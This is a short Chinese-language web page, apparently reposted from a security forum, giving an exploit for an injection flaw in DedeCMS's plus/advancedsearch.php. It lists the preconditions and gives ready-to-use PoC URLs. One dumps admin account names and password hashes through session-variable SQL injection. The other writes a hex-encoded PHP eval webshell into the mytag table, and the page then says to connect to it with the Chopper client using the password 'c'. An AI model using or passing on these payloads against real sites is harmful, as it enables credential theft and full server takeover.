首页 > 代码库 > dedecms最新注入和getshell漏洞利用
dedecms最新注入和getshell漏洞利用
漏洞分析:https://www.t00ls.net/thread-35569-1-1.html
条件利用:
1.漏洞代码在/plus/advancedsearch.php 文件中
2.php.ini要开启session.auto_start = 1
3.必须知道一个存在的mid,需要后台有添加自定义搜索模型
爆账号密码poc:
http://localhost/dedecms/plus/advancedsearch.php?mid=1&_SESSION[123]=select concat(0x7c,userid,0x7c,pwd,0x7c) as aid from `%23@__admin` aaa &sqlhash=123
getshell poc:
http://localhost/dedecms/plus/advancedsearch.php?mid=6&_SESSION[123]=update `%23@__mytag` set normbody=0x3C3F706870206576616C28245F504F53545B635D293B3F3E where aid=1 limit 1&sqlhash=123
然后菜刀链接http://localhost/dedecms/plus/mytag_js.php?aid=1 密码:c
dedecms最新注入和getshell漏洞利用
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。